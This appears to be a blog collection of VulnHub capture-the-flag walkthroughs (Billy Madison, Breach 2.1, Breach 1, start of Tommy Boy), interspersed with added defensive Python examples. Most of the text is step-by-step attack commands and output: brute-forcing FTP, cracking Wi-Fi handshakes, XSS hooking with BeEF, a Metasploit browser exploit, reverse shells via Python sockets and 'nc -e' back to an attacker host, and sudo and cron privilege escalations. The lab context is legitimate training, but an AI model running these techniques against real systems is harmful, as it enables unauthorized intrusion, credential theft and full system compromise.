X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the "Spanish Armada" combo.

-VV

.
QUIT

The third one:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect. Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric

.
QUIT

The fourth one:

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:21 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V

.
QUIT

The fifth one:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:57:31 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!

-Eric


.
QUIT

The sixth one:

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:41 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!

-V


.
QUIT

That’s all, and it’s clear that Veronica ran the virus that Eric uploaded to the FTP server. These mails contain some interesting information: I need to port knock a sequence of ports to open the FTP one, and Eric’s account credentials are eric:ericdoesntdrinkhisownpee. So I opened the YouTube video linked in the second mail, wrote down the “Spanish Armada combo”, and then ran this command:

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host-timeout 201 --max-retries 0 -T5 -p $x 192.168.1.17; done;

Now I tried to login into FTP:

ftp 192.168.1.17

A login prompt appeared and I typed Eric’s credentials; now I am logged in.

PART TWO

Listing files I found a .notes file and other random things, so I downloaded it:

get .notes

Now open it; this is the content:

Ugh, this is frustrating.  

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(. 
To make matters worse, my privesc exploits aren't working.  
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) 
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.

-EG

So to activate the SSH backdoor I need to send an email with a specific text, but I also need the password, which is in Veronica’s FTP folder. First of all open the YouTube video and complete the sentence: My kid will be a soccer player. Now I can brute force Veronica’s FTP credentials:

medusa -h 192.168.1.17 -u veronica -P veronica.txt -M ftp

After a minute I got the credentials:

ACCOUNT FOUND: [ftp] Host: 192.168.1.17 User: veronica Password: babygirl_veronica07@yahoo.com [SUCCESS]

Now I can log in to Veronica’s account. I found two files: the first one is a .cap file and the second one is an email. Download them, but remember to activate binary mode first:

binary
get eg-01.cap
get email-from-billy.eml

This is the email content:

        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. :-)

Kisses,

Billy

Then I opened the .cap file and noticed that it was a capture of Eric’s Wi-Fi handshake. So I launched the command:

aircrack-ng -w rockyou.txt eg-01.cap

After some minutes I cracked the Wi-Fi password: triscuit*. Now I have the SSH credentials, but I need to activate the backdoor by sending an email. If you remember the first nmap scan, there is an SMTP service running on port 2525, so I can telnet to it and send the email from there:

telnet 192.168.1.17 2525

Now I am connected to the SMTP service and can send the email. I used the Veronica and Eric addresses found in the first .cap file:

EHLO kali
MAIL FROM:eric@madisonhotels.com
RCPT TO:vvaughn@polyfector.edu
DATA
My kid will be a soccer player
.
QUIT

Now I performed another nmap scan to see which port I had opened:

nmap 192.168.1.17

And I discovered that the backdoor was on port 1974:

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-14 18:57 CEST
Nmap scan report for 192.168.1.17
Host is up (0.00037s latency).
Not shown: 993 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
23/tcp   closed telnet
80/tcp   open   http
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1974/tcp open   drp
2525/tcp open   ms-v-worlds
MAC Address: 00:0C:29:A0:57:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.81 seconds

So I connected to the SSH backdoor with eric:triscuit*:

ssh eric@192.168.1.17 -p 1974

Now I am logged in.

PART THREE

If you want to know why the backdoor port was 1974, just run:

cat why-1974.txt

Now I need to become root and decrypt the file, so I need some privilege escalation technique. I started by looking for setgid files:

find / -perm -2000 -type f 2>/dev/null

I noticed /usr/local/share/sgml/donpcgd, which is a very uncommon file. I tried to google it without success. Then I remembered Eric’s note, which said:

"To make matters worse, my privesc exploits aren't working. One sort of worked, but I think I have it installed all backwards."

The word "backwards" was the hint, so I googled “dgcpnod” and found this page: https://blogs.akamai.com/2016/01/delegate-v9913-setuid-binary-vulnerability.html. There is a PoC of the exploit, so I followed it with some modifications:

cd /usr/local/share/sgml
touch /tmp/rootme
chmod 755 /tmp/rootme
./donpcgd /tmp/rootme /etc/cron.hourly/rootme
echo '#!/bin/bash' > /etc/cron.hourly/rootme
echo 'mknod /tmp/backpipe p; /bin/bash 0/tmp/backpipe' >> /etc/cron.hourly/rootme

It’s time to listen for a shell locally:

nc -lvp 1234

Now wait one hour and you will get a shell as root! Use Python to get a TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Now I noticed the folder /PRIVATE so I browsed into it and I found two files: BowelMovement and hint.txt. This is the content of the .txt file:

Heh, I called the file BowelMovement because it has the same initials as Billy Madison. That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:

https://en.wikipedia.org/wiki/Billy_Madison

-EG

Now I copied the BowelMovement file to /tmp, then I downloaded it locally with Eric’s account. It seems to be a TrueCrypt volume (“That truely cracks me up!”), so first of all I created a custom dictionary file with CeWL:

cewl -d 0 -w wordlist.txt https://en.wikipedia.org/wiki/Billy_Madison

Now crack the volume with truecrack:

truecrack -t BowelMovement -w wordlist.txt

After some minutes I discovered the password, which is execrable. Now I need to mount the volume:

truecrypt --mount BowelMovement

Now unzip secret.zip:

unzip secret.zip

And you will find the .doc file and THE-END.txt. Open the second file and we have completed the VM!


[VULNHUB] Breach: 2.1

With this awesome Boot2Root VM I learned a lot about XSS, client-side attacks and privilege escalation too. Let’s start.

PART ONE

I always start with an nmap scan:

nmap 192.168.110.151 -sV

This is the output:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-22 15:02 CEST
Nmap scan report for 192.168.110.151
Host is up (0.0034s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE VERSION
111/tcp open  rpcbind 2-4 (RPC #100000)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds

OK, something went wrong, so I retried the command with a full port-range scan:

nmap -sV -p 1-65535 192.168.110.151

Now it is more interesting:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-22 15:05 CEST
Nmap scan report for 192.168.110.151
Host is up (0.012s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
111/tcp   open  rpcbind 2-4 (RPC #100000)
57477/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.09 seconds

There is only an SSH server to analyze, so I tried to log in:

ssh 192.168.110.151 -p 65535

And a banner appeared:

#############################################################################
#                  Welcome to Initech Cyber Consulting, LLC                 #
#            All connections are monitored and recorded                #
#                Unauthorized access is encouraged                     #
#        Peter, if that's you - the password is in the source.         #
#          Also, stop checking your blog all day and enjoy your vacation!   # 
#############################################################################

I collected a username (peter), but I had to find the password, which is “in the source”. I lost 2 days looking for this password until in the end I guessed it: “inthesource”. So I connected to SSH again with peter as username:

ssh peter@192.168.110.151 -p 65535

I used inthesource as password and I couldn’t believe that it worked. Unfortunately I got an error after using this password:

Connection to 192.168.110.151 closed.

That was strange, so I retried the nmap scan:

nmap -sV -p 1-65535 192.168.110.151

And I found that the port 80 was open:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-22 15:11 CEST
Nmap scan report for 192.168.110.151
Host is up (0.012s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
57477/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.23 seconds

OK, I visited http://192.168.110.151 and only a welcome page appeared. Looking into the source code I found this:

<!--I like hints! Here at Initech we don't trust our users and either should you!-->
<!--I'm not just going to stick creds here, really, I'm not. Sorry-->

Really useful! 😉
I rechecked the SSH banner and noticed that it talks about a blog; maybe there is a subdirectory to find. I could have used dirbuster, but I just guessed the URL: http://192.168.110.151/blog. It is a simple blog, and after some research I found a persistent XSS on the register page. So I used the BeEF framework to hook a possible victim’s browser:

sudo beef-xss -x

Type " into the username input field on the register page, followed by a script tag with http://192.168.110.2:3000/hook.js as its src parameter. After some minutes the victim browser was hooked. I tried to run some commands from BeEF without success, so I took a look at the User-Agent:

Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0

Our victim, who is Peter, is using Firefox 15, which is vulnerable. So I fired up Metasploit:

sudo msfconsole
use exploit/multi/browser/firefox_proto_crmfrequest
set PAYLOAD firefox/shell_reverse_tcp
set SRVHOST 192.168.110.2
set URIPATH shell
set LHOST 192.168.110.2
exploit

Then I went to the register page again and typed this into the iframe src parameter after the ":

http://192.168.110.2/shell

After some minutes I got a shell in Metasploit and I upgraded it to a meterpreter one:

sessions -u 0

Now I invoked the Unix shell:

shell

And I got a TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Now I was logged in as peter. I browsed to the /home directory and collected two new usernames:
milton
bill

PART TWO

I moved to the /tmp folder and downloaded LinEnum. I gave it execute permission:

chmod +x LinEnum.sh

And I ran it:

./LinEnum.sh

I discovered that there was a MySQL server accessible as root without a password. So I connected to it:

mysql -h 127.0.0.1 -u root

First of all I listed the databases:

SHOW databases;

This is the output:

+--------------------+
| Database           |
+--------------------+
| information_schema |
| blog               |
| mysql              |
| oscommerce         |
| performance_schema |
+--------------------+
5 rows in set (0.03 sec)

Then I looked into oscommerce:

USE oscommerce;
SHOW tables;
SELECT * FROM osc_administrators;

And this is the table content:

+----+-----------+-------------------------------------+
| id | user_name | user_password                       |
+----+-----------+-------------------------------------+
|  1 | admin     | 685cef95aa31989f2edae5e055ffd2c9:32 |
+----+-----------+-------------------------------------+
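An added note on that row before the author's own reading of it (example code, not from the original post): osCommerce 2.x stores administrator passwords as md5(salt + password) followed by a colon and the salt, which is exactly the "<32 hex chars>:32" shape in the table. A lookup service that is handed only the digest cannot know about the salt, so it reports salt and password glued together as one string. The Python below, with function names of my own choosing, verifies candidates against that layout and, for contrast, shows the PBKDF2-based storage a current application should use instead; PAGE_STORED is the value from the table above.

```python
import hashlib
import hmac
import os


def osc_hash(password: str, salt: str) -> str:
    """osCommerce 2.x scheme: md5(salt + password), stored as "<md5hex>:<salt>"."""
    digest = hashlib.md5((salt + password).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"


def osc_verify(stored: str, candidate: str) -> bool:
    """Check a candidate password against a stored "<md5hex>:<salt>" value."""
    digest, sep, salt = stored.partition(":")
    if not sep or len(digest) != 32:
        return False
    return hmac.compare_digest(osc_hash(candidate, salt), f"{digest}:{salt}")


def password_from_lookup(stored: str, lookup_plaintext: str):
    """A lookup service sees only the bare digest, so it reports salt+password as
    one string (e.g. "32admin"). Strip the salt and confirm the remainder verifies."""
    _, _, salt = stored.partition(":")
    if not lookup_plaintext.startswith(salt):
        return None
    candidate = lookup_plaintext[len(salt):]
    return candidate if osc_verify(stored, candidate) else None


# Value copied from the osc_administrators table on this page.
PAGE_STORED = "685cef95aa31989f2edae5e055ffd2c9:32"

# Hardened replacement: PBKDF2-HMAC-SHA256 with a 16-byte random salt and a high
# iteration count, so a short known salt plus a fast hash no longer makes
# precomputed lookups practical.
PBKDF2_ITERATIONS = 600_000


def pbkdf2_hash(password: str, salt: bytes = b"") -> str:
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(stored: str, candidate: str) -> bool:
    try:
        scheme, iters, salt_hex, dk_hex = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    except ValueError:  # malformed record, bad hex or bad iteration count
        return False
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("page hash, candidate 'admin' verifies:", osc_verify(PAGE_STORED, "admin"))
    print("lookup result '32admin' ->", password_from_lookup(PAGE_STORED, "32admin"))
    record = pbkdf2_hash("admin")
    print(record, pbkdf2_verify(record, "admin"))
```

Running it against PAGE_STORED confirms whether the author's reading (salt 32, password admin) is consistent with the digest; the two-character salt is the reason a public lookup table still worked here, since the salt is stored in clear next to the digest and MD5 costs nothing to recompute.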

The hash looks like MD5, so I browsed to CrackStation and pasted the hashed password without the :32. It reported that the password was 32admin, which is a little strange; maybe the 32 is the salt, so the real password is just admin. Looking again at the LinEnum output I saw that the VM is listening on port 2323, so I just connected to it with telnet:

telnet 127.0.0.1 2323

I found some coordinates, and a login prompt appeared:

29 45'46" N 95 22'59" W

Looking them up on Google Maps I discovered that these coordinates point to the Houston Police Department Memorial. I needed a username to log in: I tried milton, but a password prompt appeared; I tried Houston and it worked, but immediately a countdown showed up (3…2…1…) and there was a question to answer:

Whose stapler is it?

Of course, it’s mine! So I used mine as the password and I got a shell as milton. Looking around I discovered that in the /var/www folder there was an html2 folder which contained another folder: oscommerce. At this point there was nothing else to do, so I tried a rescan with nmap:

nmap -sV -p 1-65535 192.168.110.151

Magically a new HTTP port was open: 8888. I browsed to http://192.168.110.151:8888, which has directory listing enabled. I clicked on /oscommerce and the site showed up. I went to http://192.168.110.151:8888/oscommerce/admin and logged in with admin:admin. Now I needed to find an upload form, and I discovered a File Manager under the Tools tab. Unfortunately I couldn’t upload anything into the web server root directory, so I looked for a writable folder and found one: includes/work. I uploaded the b374k PHP shell and typed this into its Terminal tab:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

But before pressing ENTER I started listening locally:

sudo nc -lvp 1234

Now I got the shell and I am logged in as blumbergh. Next I tried to escalate privileges.

PART THREE

First I checked what this user can run as root:

sudo -l

I discovered that this user can execute tcpdump as root, and I know that tcpdump has a post-rotate command option (-z). So I switched to /tmp and typed:

echo "nc 192.168.110.2 1235 -e /bin/bash" > shell.sh

Give +x permission:

chmod +x shell.sh

Then I started to listen locally:

sudo nc -lvp 1235

Then I executed the following command:

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root

Got the shell as root! Then I browsed to /root and I listed the files:

ls -al

I gave +x permission to .flag.py and executed it:

./.flag.py

VM completed!


[VULNHUB] Breach 1

This is the first VM of a series. It was really interesting and funny!

PART ONE

First of all I performed an nmap scan, but I won’t paste the output here because 65389 ports showed up as open, which was really strange. Port 80 is open, so I checked whether there was a website running on the VM: I browsed to http://192.168.110.140 and the website appeared. Looking into the page source I discovered this:

<!------ Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

This seems to be a base64-encoded string, so I decoded it; this was the result:

cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh

Another base64-encoded string; I decoded it again and finally found something interesting:

pgibbons:damnitfeel$goodtobeagang$ta
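The decoding above was done by hand. As an added example that is not part of the original post, here is a small Python helper that pulls tokens out of HTML comments and peels base64 layers until the result stops being base64; nested encodings like this one turn up both in CTF pages and in obfuscated web content, so having the loop scripted saves repeating the manual step. The SAMPLE_HTML fragment is constructed to mirror the comment found on this page, and the function names are my own.

```python
import base64
import binascii
import re
import string

# Strict base64 alphabet with optional padding; the length must be a multiple of 4.
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Matches comments of the form <!------ TOKEN -----> with dash runs of any length.
_COMMENT_RE = re.compile(r"<!--+\s*(.*?)\s*-+>", re.DOTALL)


def looks_like_base64(text: str) -> bool:
    """Cheap syntactic check before attempting a decode."""
    text = text.strip()
    return len(text) >= 4 and len(text) % 4 == 0 and _B64_RE.match(text) is not None


def peel_base64(blob: str, max_depth: int = 10) -> list:
    """Decode nested base64 one layer at a time.

    Returns every layer seen, outermost first. The last element is the first
    value that no longer decodes to printable ASCII, or the input itself when it
    was not base64 at all. max_depth guards against pathological input.
    """
    layers = [blob.strip()]
    for _ in range(max_depth):
        current = layers[-1]
        if not looks_like_base64(current):
            break
        try:
            text = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break
        if not text or any(ch not in string.printable for ch in text):
            break  # binary payload: stop here instead of treating it as another text layer
        layers.append(text)
    return layers


def comment_tokens(html: str) -> list:
    """Inner text of every HTML comment (the page hid its blob in one)."""
    return [m.group(1) for m in _COMMENT_RE.finditer(html)]


def find_hidden_credentials(html: str) -> list:
    """(user, password) pairs recovered from base64 blobs inside HTML comments."""
    found = []
    for token in comment_tokens(html):
        innermost = peel_base64(token)[-1]
        user, sep, password = innermost.partition(":")
        if sep and user and password:
            found.append((user, password))
    return found


# Constructed page fragment mirroring the comment found in the Breach 1 source.
SAMPLE_HTML = """<html><body>
<!------ Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->
<!-- plain comment, nothing encoded -->
</body></html>"""

if __name__ == "__main__":
    for depth, layer in enumerate(peel_base64(comment_tokens(SAMPLE_HTML)[0])):
        print(f"layer {depth}: {layer}")
    print(find_hidden_credentials(SAMPLE_HTML))
```

Running it prints the three layers (outer blob, inner blob, credentials) and the recovered user:password pair. When a layer decodes to something that is not printable ASCII the loop stops and returns that layer's base64 text as the innermost element rather than mangling a binary payload.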

A username and a password; maybe they will be useful later. Before going further I scanned the website with dirbuster to find some directories, and I found /images, which contains several images. I downloaded all of them and checked with exiftool whether they had any interesting information. I discovered that the image bill.png contains coffeestains as a comment. OK, now I can click on the image at the center of the website page and I will be redirected to another page where I can access the Employee Portal. Now I need to log in: I tried the credentials recovered from the page source and it worked!

PART TWO

The next step is to analyze the portal. First of all I noticed that there were 3 unread messages in the user’s inbox, so I read them. The first one was sent by the admin, who says that all sensitive information should be posted in the admin portal. The second and the third one talk about the purchase of an IDS/IPS system, and I found a link to the keystore: http://192.168.110.140/.keystore. I downloaded it because it is really important. Then I switched to the “View Account” section and discovered a comment by this user (Peter Gibbons), titled “SSL implementation test capture”. I found a link to a .pcap file: http://192.168.110.140/impresscms/_SSL_test_phase1.pcap, so I downloaded it. A useful piece of information in the comment is this:

They told me the alias, storepassword and keypassword are all set to 'tomcat'.

Do you remember the .keystore file? I can extract the private key from it and then decrypt the traffic. So I used this command to extract the private key:

keytool -importkeystore -srckeystore keystore -destkeystore key.p12 -deststoretype PKCS12 -srcalias tomcat

Now you need to type the destination file password (I used tomcat again) and the source keystore password (which is tomcat) and you will get the private key file. Now open Wireshark, go to Settings and under Protocols select SSL. Click Edit… next to RSA key list, press the + and fill in the fields: IP 192.168.110.140, Port 8443, Protocol http, Key File the extracted private key, Password tomcat. Press OK and import the .pcap file. If everything is correct you should be able to see the Client Hello string. Right click on it and follow the SSL stream. I discovered that a user tried to log in to /_M@nag3Me/html and used tomcat:Tt\5D8F(#!*u=G)4m7zB as username and password; I decoded the Basic Authentication string from the GET request. So just try to log in: browse to https://192.168.110.140:8443/_M@nag3Me/html and use the username and password discovered before. Now I am logged into the Tomcat server.

PART THREE

Now it’s time to get a shell. I can simply deploy a .war file (I used the laudanum one). Once I had uploaded cmd.war, I browsed to https://192.168.110.140:8443/_M@nag3Me/cmd/cmd.jsp. Now I started listening locally:

sudo nc -lvp 1234

Then I executed the following command on the Tomcat server:

nc 192.168.110.2 1234 -e /bin/bash

Then I got a shell, but I needed a TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Perfect, now I started to analyze the server. First of all I browsed to /home to see which usernames are available: blumbergh and milton. Do you remember the comment I found in an image with exiftool? Maybe it is the password of one of these users. So I tried to log in as blumbergh with coffeestains as password, and it worked! Now I need to escalate my privileges. First of all I checked what the user can run as root:

sudo -l

This is the output:

(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh

Let’s check what tidyup.sh is:

cat /usr/share/cleanup/tidyup.sh

This is the important part:

#This script is set to run every 3 minutes as an additional defense measure against hackers.

So I can create a temporary file with the netcat shell one-liner inside, cat it and pipe it into sudo tee to overwrite the .sh script. Let’s create the file:

echo "nc 192.168.110.2 1235 -e /bin/bash" > /tmp/shell

And perform the trick:

cat /tmp/shell | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
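Both privilege escalations in these two Breach writeups (tcpdump -z under sudo in Breach 2.1, and tee into a root-run cleanup script here) go through sudo, and sudo logs every invocation with the full command line. As an added example that is not part of the original posts, the Python below parses lines in the format sudo writes to auth.log and flags those two patterns. The SAMPLE_SUDO_LOG lines are constructed from the commands in the walkthroughs (two real hits next to two harmless invocations); the rule names, ROOT_RUN_PREFIXES and FILE_WRITERS are my own choices.

```python
import os
import re
import shlex

# Constructed lines in the syslog format sudo uses; the first two reproduce the
# commands from these walkthroughs, the last two are ordinary administration.
SAMPLE_SUDO_LOG = """\
Aug 22 16:02:11 breach sudo: blumbergh : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root
Aug 22 16:05:42 breach sudo: blumbergh : TTY=pts/0 ; PWD=/home/blumbergh ; USER=root ; COMMAND=/usr/bin/tee /usr/share/cleanup/tidyup.sh
Aug 22 16:06:01 breach sudo: blumbergh : TTY=pts/0 ; PWD=/home/blumbergh ; USER=root ; COMMAND=/usr/sbin/tcpdump -n -i eth0 -c 100
Aug 22 16:07:30 breach sudo:   milton : TTY=pts/1 ; PWD=/home/milton ; USER=root ; COMMAND=/usr/bin/apt-get update
"""

SUDO_LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sudo:\s+(?P<user>\S+) : "
    r"TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# Paths under which a file written as root is normally executed as root later.
ROOT_RUN_PREFIXES = ("/etc/cron", "/etc/init.d", "/etc/rc", "/etc/profile.d")
FILE_WRITERS = {"tee", "cp", "mv"}


def parse_sudo_line(line: str):
    """Split one sudo log line into its fields, or return None if it is not one."""
    m = SUDO_LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    try:
        rec["argv"] = shlex.split(rec["cmd"])
    except ValueError:  # unbalanced quotes in the logged command
        rec["argv"] = rec["cmd"].split()
    return rec


def check_tcpdump_postrotate(rec):
    """tcpdump -z runs the named program on every rotated capture, as the user
    given by -Z (or the invoking uid); under sudo that is command execution as root."""
    argv = rec["argv"]
    if not argv or os.path.basename(argv[0]) != "tcpdump" or "-z" not in argv:
        return None
    i = argv.index("-z")
    target = argv[i + 1] if i + 1 < len(argv) else "(missing)"
    return {"rule": "tcpdump-postrotate", "target": target}


def check_root_script_overwrite(rec):
    """tee/cp/mv under sudo aimed at a scheduler directory or a shell script
    replaces content that root will execute later."""
    argv = rec["argv"]
    if not argv or os.path.basename(argv[0]) not in FILE_WRITERS:
        return None
    for arg in argv[1:]:
        if arg.startswith("-"):
            continue
        if arg.startswith(ROOT_RUN_PREFIXES) or arg.endswith(".sh"):
            return {"rule": "root-script-overwrite", "target": arg}
    return None


CHECKS = (check_tcpdump_postrotate, check_root_script_overwrite)


def scan_sudo_log(text: str) -> list:
    """One finding per suspicious sudo line, in log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_sudo_line(line)
        if rec is None:
            continue
        for check in CHECKS:
            hit = check(rec)
            if hit:
                hit.update(ts=rec["ts"], user=rec["user"], runas=rec["runas"], cmd=rec["cmd"])
                findings.append(hit)
                break
    return findings


if __name__ == "__main__":
    for f in scan_sudo_log(SAMPLE_SUDO_LOG):
        print(f"{f['ts']} {f['user']} -> {f['runas']}: {f['rule']} target={f['target']}")
```

A real deployment would feed it auth.log or journalctl output and forward the findings to whatever collects alerts. The host-side fix is narrower sudoers rules (no rule for tcpdump or tee at all is safer than one with a fixed path, since the file-overwrite primitive is the problem) and a cleanup script that only root can write.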

Now listen locally:

sudo nc -lvp 1235

And wait for the shell. Once you get it, browse to /root and list the files:

ls -al

There is a .flag.txt file; just cat it:

cat .flag.txt

VM rooted and completed!


[VULNHUB] Tommy Boy: 1

Tommy Boy is an awesome VulnHub VM with an awesome story inside. The objective of this machine is to restore a backup of a website, The Callahan Auto company and collect 5 flags to unlock a final message. Let’s start!

Flag 1

First of all, scan the IP with nmap:

nmap 192.168.1.15 -A

This is the output:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-02 15:13 CEST
Nmap scan report for 192.168.1.15
Host is up (0.0027s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries 
| /6packsofb...soda /lukeiamyourfather 
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds

There are 3 services running on the machine: two websites and SSH. Open 192.168.1.15 in the browser and you will see an error message saying that the website backup needs to be restored. Analyzing the source code of the page I noticed this:

<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal.  Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8--> 
<!--Comment from Richard: Ah! How could I forget?  Thanks-->

